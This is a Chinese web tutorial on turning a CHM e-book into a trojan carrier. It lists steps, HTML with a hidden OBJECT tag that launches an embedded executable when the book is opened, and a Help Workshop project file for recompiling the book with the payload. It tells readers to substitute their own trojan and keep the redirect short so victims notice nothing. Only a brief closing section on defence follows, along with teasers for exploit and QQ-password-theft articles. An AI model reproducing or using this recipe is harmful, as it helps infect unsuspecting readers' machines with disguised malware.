建站极客
实用技巧 安全教程 正文
CHM电子书木马制作攻略教程
所属分类:
实用技巧 / 安全教程
阅读数:
254
收藏 0
赞 0
分享
说起CHM格式的电子书,可能无人不晓。有很大一部分电子图书都是使用CHM格式编译的。由于木马程序嵌入了电子书中,杀毒软件无法对其中存在的病毒等破坏性程序进行检查和清除。想知道这类电子书的制作方法吗?今天笔者就以实例形式和大家一道分析一下。 Step1:要想制作一个完美的CHM木马,当然少不了电子书的制作工具。在这里我们选择微软自家的Microsoft HTML Help Workshop。 当然了,作为木马程序的载体,一本CHM电子书是少不了的。本文演示所采用的是系统帮助文件中现成的windows.chm。 Step2:首先运行windows.chm,在右侧的空白处点击右键菜单,进入"属性"页。记录下该电子文档的默认主页default.htm和标题栏文字Windows 2000两项信息。 Step3:接下来需要制作一个可以让木马运行并且同时可以自动跳转到windows.chm默认主页的网页,例如cytkk.htm,源代码如下: <HTML> <HEAD> <meta http-equiv="refresh" content="3;url='default.htm'"> </HEAD> <BODY> <OBJECT Width=0 Height=0 style="display:none;" TYPE="application/x-oleobje ct" CODEBASE="灰色按钮克星.exe"> </OBJECT> </BODY> </HTML> 代码注释: content="3是转向时间(单位为秒),可以根据木马程序的运行时间自行修改,建议不要超过5秒。其中的default.htm可以改为你用的电子书的默认主页名,灰色按钮克星.exe为木马程序名,你可以根据情况更改。 Step4:运行HTML Help Workshop,选择文件菜单下的反编译项。接下来在反编译后的目录中可以看到windows.hhc(对应帮助文档左侧的"目录"项)和windows.hhk(对应帮助文档左侧的"索引"项)。 Step5:现在要做的就是把木马程序复制到反编译后的目录中(本文中以插入灰色按钮克星.exe这款小软件为例),并在此目录下建立一个例如文件名为cytkk.hhp的文件(用记事本即可),代码如下: [OPTIONS] Compatibility=1.1 or later Compiled file=windows.chm Default Window=Main Language=0x804 中文(中国) [WINDOWS] Main="Windows 2000","windows.hhc","windows.hhk","cytkk.htm",,,,,,0x420,150,0x104E,,0x0,0x0,,,,,0 [FILES] cytkk.htm 灰色按钮克星.exe 代码注释: windows.chm可以改为你要生成的电子书名,而灰色按钮克星.exe则把它改为要嵌入的木马程序名,Main=后面改为在第一步时你得到的标题栏文字,windows.hhc及windows.hhk分别改为第三步得到的文件名。 最后用HTML Help Workshop打开cytkk.hhp,点击"文件"→"编译",待提示完成后,就可以在目标目录中发现已经编译好的带有木马的电子书windows.chm了。 高手传经:防之有道 我们不可能对下载的每本书都进行反编译工作来加以检查,那是会累死人的。笔者建议大家在下载电子书籍时,尽量去知名网站下载。 另外读者朋友们也可以修改本地安全属性,使CHM木马无法在本地运行木马程序,将注册表"HKEY_CURRENT_U SER\Software\Microsoft\Windows\Current Version\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3。
一些通用跳转地址,XXOXX的时候有点用 近日在写exploit的时候需要用到一些其他语言的call ebx的跳转地址,但是metasploit的opcode DB没有包括繁体中文、日文、韩文机器的跳转地址,所以费了点时间收集了下,在这里要感谢傲少提供的机器给我去找地址。现在贴到这里,方便大家。
评论 0
收藏 0
赞 0
分享
入侵过程中用过的三大门派的几个小工具[推荐] vbs在入侵中的作用、我在入侵中的注意的细节、跨站、入侵中的批处理、入侵过程中用的小工具共有这五个,当然随着期数的变化,出的题目也会增加,现在大家针对这些题目欢迎来稿呀,不要被高手这两个字吓住了。
评论 0
收藏 0
赞 0
分享
如何防范别人盗你的qq号(盗别人的qq密码) 想用别人的 qq号码,最主要的就是把别人的密码偷来,那么怎么盗别人的qq密码呢?不过,没有人会告诉你:我的密码是什么什么,请你尽情的用我的号码吧!那么,黑客是怎么去把别人的密码偷来呢
评论 0
收藏 0
赞 0
分享
QQ聊天记录删除了怎么恢复 详细步骤教程 许多网友都想知道“QQ聊天记录删除了怎么恢复”,因为QQ聊天记录对于我们来说是很重要的数据。下面我们就来介绍下如何解决QQ聊天记录删除恢复的问题
评论 0
收藏 0
赞 0
分享
php+mysql注入页面实现 最近在弄靶场,原本是打算找一些漏洞程序来做实验环境,但是去找这些程序感觉太麻烦了,几段代码能实现的东西还是自己写吧
评论 0
收藏 0
赞 0
分享
QQ密码被盗怎么办 (教你如何找回QQ密码) QQ密码保护是一套保障QQ密码安全的机制。通过给你的QQ号填写对应的相关资料,如证件号、安全提示问题、安全邮箱等,给你的QQ号穿一件防弹衣。一旦出现问题,就可以通过QQ密码保护找回QQ密码
评论 0
收藏 0
赞 0
分享
查看更多